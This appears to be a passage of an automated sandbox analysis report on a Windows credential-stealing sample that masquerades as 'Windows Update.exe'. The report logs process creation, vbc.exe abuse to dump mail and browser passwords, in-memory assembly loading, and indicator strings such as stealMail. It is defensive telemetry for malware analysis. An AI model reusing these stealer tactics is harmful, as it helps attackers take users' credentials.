          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe"
          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"
          Source: unknownProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\AppData\Roaming\WindowsUpdate.exeProcess created: C:\Users\user\AppData\Roaming\WindowsUpdate.exe "C:\Users\user\AppData\Roaming\WindowsUpdate.exe"
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128
          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\Desktop\5.exe "C:\Users\user\Desktop\5.exe" Jump to behavior
          Source: C:\Users\user\Desktop\5.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Users\user\AppData\Roaming\Windows Update.exe "C:\Users\user\AppData\Roaming\Windows Update.exe" Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exe dw20.exe -x -s 2128Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holdermail.txt"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exe /stext "C:\Users\user\AppData\Local\Temp\holderwb.txt"Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6244 -s 2128Jump to behavior
          Source: C:\Users\user\Desktop\5.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD4F7A AdjustTokenPrivileges,10_2_04BD4F7A
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_04BD4F43 AdjustTokenPrivileges,10_2_04BD4F43
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeSystem information queried: HandleInformationJump to behavior
          Source: C:\Users\user\Desktop\5.exeFile created: C:\Users\user\AppData\Local\Temp\nsbB89.tmpJump to behavior
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_00402012 CoCreateInstance,MultiByteToWideChar,1_2_00402012
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_0040411B GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,1_2_0040411B
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
          Source: 5.exe, 00000001.00000002.269857758.00000000148A0000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291364573.0000000004A00000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.291429637.0000000004A90000.00000004.00020000.sdmp, 5.exe, 00000002.00000001.265812009.0000000000414000.00000040.00020000.sdmp, 5.exe, 00000002.00000002.291267460.0000000003861000.00000004.00000001.sdmp, 5.exe, 00000002.00000002.290361151.0000000000400000.00000040.00000001.sdmp, 5.exe, 00000002.00000002.291521813.0000000004B22000.00000040.00000001.sdmp, Windows Update.exe, 00000006.00000002.309901601.00000000147A0000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
          Source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
          Source: C:\Users\user\Desktop\5.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\Desktop\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\Desktop\5.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeCode function: 16_2_00411196 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,free,Process32NextW,CloseHandle,16_2_00411196
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.csBase64 encoded string: 'hxYuBRkiiqF2m5U/v+PiR2nswhUqG0SslS0sInRy44yND2XYDxDtrDNZ25ZQ5u6E', 'ybZRZ/CCW7udMx58FQTRrK9RIMwrfnmlR5Z83UvMyu30rrOEs1DzW7d2mK+Drn3u', 'PN4TW3peZ3UeXi7asDB56E4dMEf6JrdkxXNUlrUjLlWcjHK1wZ5CpLZZKB/ocuFWy9Kw0Q8tIc1Qv7OEgqzD+w=='
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.csCryptographic APIs: 'CreateDecryptor'
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\dw20.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: C:\Users\user\Desktop\5.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\vbc.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
          Source: C:\Users\user\Desktop\5.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dllJump to behavior
          Source: Binary string: mscorlib.pdbHrs source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.343602667.000000000083F000.00000004.00000020.sdmp
          Source: Binary string: C:\Users\Jovan\Documents\Visual Studio 2010\Projects\Stealer\CMemoryExecute\CMemoryExecute\obj\Release\CMemoryExecute.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.391527665.00000000075C0000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.386168865.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.352528568.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.344665694.00000000028C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: C:\Windows\assembly\GA.pdbmscorlib\2.0.0.0__b77a5c561934e089\mscorlib.dll source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: wntdll.pdb source: 5.exe, 00000001.00000003.263698625.0000000014AD0000.00000004.00000001.sdmp, 5.exe, 00000001.00000003.263528153.0000000014940000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.303805285.00000000149D0000.00000004.00000001.sdmp, Windows Update.exe, 00000006.00000003.300117905.0000000014840000.00000004.00000001.sdmp
          Source: Binary string: indows\mscorlib.pdbpdblib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: f:\Projects\VS2005\mailpv\Release\mailpv.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 0000000F.00000000.330182095.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000000.329440107.0000000000400000.00000040.00000001.sdmp, vbc.exe, 0000000F.00000002.333065075.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdb2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: mscorlib.pdbAA source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: DDsymbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: f:\Projects\VS2005\WebBrowserPassView\Release\WebBrowserPassView.pdb source: Windows Update.exe, Windows Update.exe, 0000000A.00000002.388678020.00000000049C9000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.353745665.00000000038C1000.00000004.00000001.sdmp, Windows Update.exe, 0000000A.00000000.306182092.0000000000414000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.351268586.0000000000400000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000002.389429585.0000000004AE2000.00000040.00000001.sdmp, Windows Update.exe, 0000000A.00000000.347967059.0000000004A50000.00000004.00020000.sdmp, Windows Update.exe, 0000000A.00000002.387761153.00000000038C1000.00000004.00000001.sdmp, vbc.exe, vbc.exe, 00000010.00000000.331574384.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000002.343556416.0000000000400000.00000040.00000001.sdmp, vbc.exe, 00000010.00000000.331207385.0000000000400000.00000040.00000001.sdmp
          Source: Binary string: C:\Windows\mscorlib.pdbf source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp
          Source: Binary string: oC:\Windows\mscorlib.pdb source: Windows Update.exe, 0000000A.00000000.356541770.0000000006F8A000.00000004.00000010.sdmp, Windows Update.exe, 0000000A.00000002.390762786.0000000006F8A000.00000004.00000010.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: Windows Update.exe, 0000000A.00000002.385169894.0000000000AD7000.00000004.00000040.sdmp, Windows Update.exe, 0000000A.00000000.351921404.0000000000AD7000.00000004.00000040.sdmp

          Data Obfuscation:

          barindex
          Yara detected MSIL InjectorShow sources
          Source: Yara matchFile source: 00000014.00000002.416445221.0000000005EE0000.00000004.00000001.sdmp, type: MEMORY
          .NET source code contains potential unpackerShow sources
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 2.2.5.exe.4b20000.15.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.33.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.2.Windows Update.exe.4ae0000.16.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs.Net Code: IsDotNet System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs.Net Code: run System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs.Net Code: stealMail System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 10.0.Windows Update.exe.4ae0000.55.unpack, Form1.cs.Net Code: stealWebroswers System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Users\user\Desktop\5.exeCode function: 1_2_6F1E2E45 push ecx; ret 1_2_6F1E2E58
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00401F16 push ecx; ret 2_2_00401F29
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00C52900 push esi; ret 2_2_00C5290A
          Source: C:\Users\user\Desktop\5.exeCode function: 2_2_00C52BBA push cs; ret 2_2_00C52BDA
          Source: C:\Users\user\Desktop\5.exeCode function: 2_1_00401F16 push ecx; ret 2_1_00401F29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 6_2_6F712E45 push ecx; ret 6_2_6F712E58
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00401F16 push ecx; ret 10_2_00401F29
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00AC33B9 push es; ret 10_2_00AC33BA
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00AC2BBA push cs; ret 10_2_00AC2BDA
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00AE2A04 push ss; retn 0072h10_2_00AE2A36
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_2_00AE7F6A push eax; ret 10_2_00AE7F75
          Source: C:\Users\user\AppData\Roaming\Windows Update.exeCode function: 10_1_00401F16 push ecx; ret 10_1_00401F29
